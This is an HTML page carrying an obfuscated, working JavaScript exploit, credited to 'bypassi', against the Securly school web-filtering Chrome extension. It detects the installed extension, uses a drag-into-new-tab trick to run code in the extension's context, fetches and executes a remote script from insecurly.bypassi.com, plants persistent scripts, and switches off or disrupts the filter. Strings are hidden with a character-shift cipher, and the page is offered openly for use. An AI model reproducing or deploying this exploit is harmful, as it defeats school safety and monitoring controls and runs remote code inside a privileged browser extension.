<!DOCTYPE html>
<html lang="en">

<head>
    <link rel="icon" href="https://raw.githubusercontent.com/zek-c/Securly-Kill-V111/main/IMG/insecurly%20icon.png">
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>INSECURLY</title>
    <style>
        #error {
            display: none;
        }
        
        #draggable {
            display: none;
            background-color: black;
            color: white;
            padding: 10px;
            font-weight: bold;
            cursor: pointer;
        }
        
        .shown {
            display: inline-block !important;
        }
    </style>
    <script>alert('this exploit was found by bypassi, and the icons were made by ender (https://github.com/Ender-Ghost-Craft/insecurly-icons)')</script>
    <!--   I personally could not care less whether this exploit gets patched -->
    <script defer>
function o(n, _ = 78, D = 126) {
    for (var x = n.toString().split(""), $ = 0; $ < x.length; $++) x[$].charCodeAt(0) <= D && (x[$] = String.fromCharCode((x[$].charCodeAt(0) + _) % D));
    return x.join("")
}

function d(n, _ = 78, D = 126) {
    return o(n, D - _)
}
const m = function() {
        document.body.innerHTML = `
    <style>
    body {
      background-color:black;
      color:#eeeeee;
      font-family:Arial;
    }
    h1 {
      font-size: 40px;
      font-weight:normal;
    }
    .switch-area {
      display:flex;
      margin:10px 0px;
    }
    .switch-area div{
      font-size:20px;
      padding:6px 0px;
      height:32px;
    }
    #desc {
      font-size:18px;
      max-width:320px;
    }
    #updates {
      font-size:15px;
      margin-top:15px;
      color:#999999;
    }
    /* https://danklammer.com/articles/simple-css-toggle-switch/ */
    #toggle {
        appearance: none;
        width: 62px;
        height: 32px;
        display: inline-block;
        position: relative;
        border-radius: 50px;
        overflow: hidden;
        outline: none;
        border: none;
        cursor: pointer;
        background-color: #707070;
        transition: background-color ease 0.3s;
      }
      #toggle:before {
        content: "on off";
        display: block;
        position: absolute;
        z-index: 2;
        width: 28px;
        height: 28px;
        background: #fff;
        left: 2px;
        top: 2px;
        border-radius: 50%;
        font: 10px/28px Helvetica;
        text-transform: uppercase;
        font-weight: bold;
        text-indent: -22px;
        word-spacing: 37px;
        color: #fff;
        text-shadow: -1px -1px rgba(0,0,0,0.15);
        white-space: nowrap;
        box-shadow: 0 1px 2px rgba(0,0,0,0.2);
        transition: all cubic-bezier(0.3, 1.5, 0.7, 1) 0.3s;
      }
      #toggle:checked {
        background-color: #4CD964;
      }
      #toggle:checked:before {
        left: 32px;
      }
    </style>
    <h1>INSECURLY exploit (by bypassi)</h1>
    <div class="switch-area">
      <div>securly is currently</div>
      <input id="toggle" type="checkbox" />
    </div>
    <div id="desc">
      the switch above allows you to turn the securly extension on and off. note that this will not bypass
      network filters or other filtering extensions. teachers using securly classroom will still be able to
      see your screen. more functionality is coming soon.
    </div>
    <div id="updates"></div>
    
`;
  let n = window[`chrome`][`extension`][`getBackgroundPage`](),
                 //   d           d          o
        _ = () => n.chrome,
            D = document.getElementById("toggle");
        async function x() {
            let _ = await (await fetch(`https://insecurly.bypassi.com/js.js`)).text(),
//                                             d
               D = new n[`Blob`]([_], {
//                           d
                 type: `text/javascript`
                 //            d
                }),
                x = document.createElement("script");
            x.src = URL[`createObjectURL`](D), n.document.body.appendChild(x)
                          //     d
        }
        try {
            for (let $ = 0; $ < 10; $++) Reflect.construct(Blob, []);
            x()
        } catch (C) {}
        async function t(n, _, D) {
            let x = await new Promise(n => {
                window[`webkitRequestFileSystem`](0, D.length, n)
               //                    d
            });
            return await new Promise(_ => {
                x.root.getFile(n, {}, n => {
                    n.remove(_)
                }, _)
            }), new Promise($ => {
                x.root.getFile(n, {
                    create: !0
                }, n => {
                    n[`createWriter`](x => {
                      //      d
                        x[`onwriteеnd`] = () => {
                          //     d
                            delete[x, n]
                        }, x[`onwriteend`] = () => {
                        //       d
                            $(n[`toURL`]())
                          //        d
                        }, x.write(new window[`Blob`]([D], {
                         //                       d
                            type: _
                        }))
                    })
                })
            })
        }

        function B() {
            if (!window[`location`][`hash`]) throw new window[`Error`]("IDK");
          //                 d           d                            d
            let n = location.hash.replace("#", "");
            t(Math.random() + ".js", `text/javascript`, n)[`then`](n => {
                let _ = document.createElement("script");
                _.src = n, document.body.appendChild(_)
            })
        }
        _().runtime.id.startsWith("i") || (document.getElementById("updates").textContent = `payload 3 applied. (you aren't supposed to know what this means)`, _().extension[`setUpdateUrlData`](decodeURIComponent(`%E0%B6%9E`).repeat(1024))), localStorage[`cluster`]?.startsWith(`AVOID_OS,`) || (D.checked = !0), D.onclick = function $() {
            D[`checked`] ? (delete window.WebRequestEventImpl, localStorage.clear()) : (_().management[`uninstallSelf`].bind(_().runtime.id), Storage.prototype[`setItem`].call(window[`localStorage`], `cluster`, `AVOID_OS,` + Date.now() * (Math[`random`]() + 1.5))), location.reload.call(n[`location`]), setTimeout(x, 1500)
        }, navigator[`persistLocalFiles`] = !0, t(`/i.js`, `text/javascript`, o + d + t + B + ";" + B.name + "()//"), t(`/i.html`, "text/html", d`\fC3B9@DnCB3\rp|}9|:Cp\x0E\f}C3B9@D\x0E`).then(() => {
    //                                                                                                                                            <script src="./i.js"></script/>
            window[`navigator`][`storage`][`persist`]()        })
    },
    а = ["manifest.json", "blocked.html", "blocked.js", "conf.js1", "content9.min.js", "securly.min.js", "_metadata/verified_contents.json", "fonts/Metropolis-Medium.woff", 'fonts/Metropolis-Regular.woff', "6?>DC}\x1d5DB?@?<9C{#5=9\x12?<4|G?66", "6?>DC}\x1d5DB?@?<9C|3CC", ],
    SI = {
        NONE: "",
        OLD: `iheobagjkfklnlikgihanlhcddjoihkg`,
        NEW: `joflmkccibkooplaeoinecjbmdebglab`,
        BETA: `knneimmpeamikmjijmnhjmmobddleohj`
    };
async function g(n) {
    let _;
    try {
        _ = await window[d`65D38`](d`38B?=5{5HD5>C9?>\n}}` + n + d`}` + d(а.at(d`\x01\x00`)))
    } catch (D) {
        return 0
    }
    return 200 === _[d`CD1DEC`] ? 1 : 0
}
async function gSI() {
    return await g(SI.NEW) ? SI.NEW : await g(SI.OLD) ? SI.OLD : await g(SI.BETA) ? SI.BETA : SI.NONE
}

function e(n, _) {
    let D = function(n) {
            let _ = open();
            _.chrome = top.chrome[d`5HD5>C9?>`][d`75D\x1213;7B?E>4 175`]().chrome;
            let D = document[d`3B51D5\x15<5=5>D`]("script");
            D.src = n, _.document.body.appendChild(D), top.close()
        },
        x = URL[d`3B51D5\x1F2:53D%"\x1C`](n),
        $ = new window[d`\x12<?2`]([`${o};${d};(${D})("${x}")`], {
            type: d`D5HD}:1F1C3B9@D`
        }),
        C = URL[d`3B51D5\x1F2:53D%"\x1C`]($),
        t = d`\fCDI<5\x0ExKF9C929<9DI\n89445>M\f}CDI<5\x0EXnnnn\f96B1=5nCB34?3\rp\fC3B9@DnCB3\ru` + C + d`u\x0E\f}C3B9@D\x0Ep\x0EXnnnnnnnn\x189|n\x196nI?En31>nB514nD89CznD85n5H@<?9Dn494>uDnG?B;|Xnnnnnnnn'19Dn1n3?E@<5n?6nG55;C|n'5u<<n25n213;|||Xnnnn\f}96B1=5\x0E`;
    return _ === SI.BETA ? `${d`69<5CICD5=\n38B?=5{5HD5>C9?>\n}}`}${_}${d`}D5=@?B1BI}9|8D=<q9=@?BDvu`}${C}')` : d`38B?=5{5HD5>C9?>\n}}` + _ + d`}` + (.3 > Math.random() ? "/" : "") + d(а[1]) + [d`\x0F31D57?BI\r`] + window[d`5>3?45%"\x19\x13?=@?>5>D`](window[d`2D?1`](t))
}

function gS2U(n) {
    return e(new window[d`\x12<?2`]([`${o};${d};(${m})()`], {
        type: d`D5HD}:1F1C3B9@D`
    }), n)
} [].__proto__[window[o`\x05+\x1F\x14!\x1E`][d`9D5B1D?B`]] = function*() {
    yield gS2U.call(this[0], this[1])
}, gSI().then(n => {
    if (n === SI.NONE) {
        let _ = document.getElementById("error");
        _.classList.add("shown"), _.textContent = d`)?En4?>uDn81F5n1>n145AE1D5nF5BC9?>n?6n#53EB<In9>CD1<<54|`
    } else {
        let D = [d`}2<?3;54|:C`, n],
            x = document.getElementById("draggable");
        x.classList.add("shown"), x[d`?>4B17CD1BD`] = n => {
            n[d`41D1$B1>C65B`].setData("text/plain", [...D])
        }, n === SI.BETA && (x.textContent += d`nvE>CD12<5zn4?>Dn3?=@<19>n96n9Dn619<Cw`)
    }
});
    </script>
</head>

<body>
    <h1>INSECURLY exploit (by bypassi)</h1>
    <div id="error"></div>
    <div id="draggable" draggable="true">drag this button into a new tab!</div>
</body>

</html>
